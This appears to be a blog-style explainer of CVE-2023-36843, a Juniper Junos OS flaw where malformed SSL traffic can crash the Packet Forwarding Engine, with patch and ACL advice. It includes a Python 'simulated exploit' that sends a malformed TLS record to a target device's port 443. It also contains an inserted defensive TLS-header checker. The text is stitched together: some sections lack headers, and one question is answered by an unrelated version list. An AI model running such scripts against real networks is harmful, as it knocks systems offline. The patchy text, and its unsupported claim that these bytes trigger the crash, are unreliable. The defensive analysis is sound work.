CVE-2023-36843 - Breaking Down Juniper Junos OS ATP Cloud Denial of Service Vulnerability
---
Summary:
A critical security vulnerability—CVE-2023-36843—has been identified in Juniper Networks' Junos OS. This flaw allows an unauthenticated attacker to crash a device’s Packet Forwarding Engine (PFE), leading to a full denial of service (DoS). The vulnerability leverages improper handling of certain malformed SSL packets, specifically when Advanced Threat Prevention (ATP) Cloud with Encrypted Traffic Insights (ETI) is enabled.
In this article, we'll walk through how this bug works, who is affected, what the impact is, and the steps to test or mitigate it. We’ll use plain English and real code snippets so you can grasp the details, even if you’re not a seasoned security pro.
1. What Is CVE-2023-36843?
The vulnerability is due to "Improper Handling of Inconsistent Special Elements" in the JSF module of Junos OS. When Juniper devices enabled for ATP Cloud with ETI receive specifically crafted, malformed SSL traffic, the PFE module can crash, requiring a manual reboot.
Why is this serious?
- 21.1: All versions 21.1R1 and up
- 21.2 / 21.3 / 21.4 / 22.1 / 22.2 / 22.3 / 22.4: Versions prior to recent "S" maintenance updates
- See the full advisory version list here (Juniper JSAs).
- They must have ATP Cloud enabled with Encrypted Traffic Insights (ETI) using security-metadata-streaming policy.
3. How Does the Exploit Work?
The core issue is that the Junos OS PFE crashes when it processes malformed SSL traffic under ATP Cloud + ETI.
4. Simulated Exploit Example
*Below is a basic Python example to send intentionally corrupted SSL handshake packets to a target device—the goal here is to highlight how trivial it is to disrupt if the service is exposed.*
```python
import socket

target_ip = "10...1"  # Junos device IP
target_port = 443     # SSL port

# Malformed SSL ClientHello (truncated/invalid)
malformed_ssl_packet = b"\x16\x03\x01\x00\x10" + b"junkjunkjunkjunk"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_ip, target_port))
s.send(malformed_ssl_packet)
s.close()
print("Malformed SSL packet sent. If device is vulnerable, it may now crash the PFE.")
```
DISCLAIMER:
This is for educational use only. Do *not* attack any device you don't own or have explicit permission to test.
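The sample record above declares a 16-byte handshake payload, but the bytes inside it do not form a handshake message. The following is an added example (not from the original article or from Juniper) of the header-consistency check an inspection device or sensor can apply to a client's first TLS record; the function name and the second sample record are assumptions made for illustration, and the page does not state which specific inconsistency triggers the PFE crash.

```python
import struct

RECORD_TYPES = {20, 21, 22, 23}   # change_cipher_spec, alert, handshake, application_data
HANDSHAKE = 22
CLIENT_HELLO = 1
MAX_RECORD_LEN = 2**14 + 2048     # largest TLS 1.2 ciphertext record

def check_first_record(data: bytes) -> list:
    """Return inconsistencies found in the first TLS record a client sends."""
    if len(data) < 5:
        return ["record header truncated"]
    ctype, major, minor, rec_len = struct.unpack("!BBBH", data[:5])
    problems = []
    if ctype not in RECORD_TYPES:
        problems.append(f"unknown content type {ctype}")
    if major != 3 or minor > 4:
        problems.append(f"implausible record version {major}.{minor}")
    if rec_len == 0 or rec_len > MAX_RECORD_LEN:
        problems.append(f"record length {rec_len} out of range")
    body = data[5:5 + rec_len]
    if len(body) < rec_len:
        problems.append(f"record declares {rec_len} bytes, only {len(body)} present")
    if ctype == HANDSHAKE:
        if len(body) < 4:
            problems.append("handshake header truncated")
        else:
            hs_type, hs_len = body[0], int.from_bytes(body[1:4], "big")
            if hs_type != CLIENT_HELLO:
                problems.append(f"first handshake type {hs_type} is not ClientHello")
            # A ClientHello normally fills exactly one record. Fragmentation is
            # legal but rare, so a mismatch is a signal to log, not proof.
            if hs_len + 4 != rec_len:
                problems.append(f"handshake length {hs_len} does not match record length {rec_len}")
    return problems

# The record from the article's snippet: a handshake header plus 16 filler bytes.
ARTICLE_RECORD = b"\x16\x03\x01\x00\x10" + b"junkjunkjunkjunk"

# Constructed, header-consistent record; 40 zero bytes stand in for a ClientHello body.
_payload = bytes(40)
CONSISTENT_RECORD = (b"\x16\x03\x01" + struct.pack("!H", len(_payload) + 4)
                     + b"\x01" + len(_payload).to_bytes(3, "big") + _payload)

if __name__ == "__main__":
    for name, rec in [("article", ARTICLE_RECORD), ("constructed", CONSISTENT_RECORD)]:
        print(name, check_first_record(rec) or "header fields consistent")
```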
- System logs (use `show log messages`) may show PFE errors or restarts like:
  `fpc PFE: FATAL ERROR -- Unrecoverable error in pfe`
Use Access Control Lists (ACLs) to block incoming unneeded SSL traffic at the network edge.
Patch ASAP:
22.4R2-S1 or 22.4R3 or newer
> *See JSA76356 for official patches and more info.*
7. Learn More & References
- Juniper Security Advisory for CVE-2023-36843 (JSA76356)
- NIST CVE Entry
- Juniper ATP Cloud Product Overview
8. Conclusion
CVE-2023-36843 is a real-world, exploitable weakness that can take entire Juniper networks offline using only unauthenticated, malformed SSL packets. If you rely on Juniper ATP Cloud with ETI, patch or mitigate now. Attackers don’t need your passwords—just the right packet.
Use defense-in-depth
Timeline
Published on: 10/12/2023 23:15:11 UTC
Last modified on: 10/17/2023 15:58:59 UTC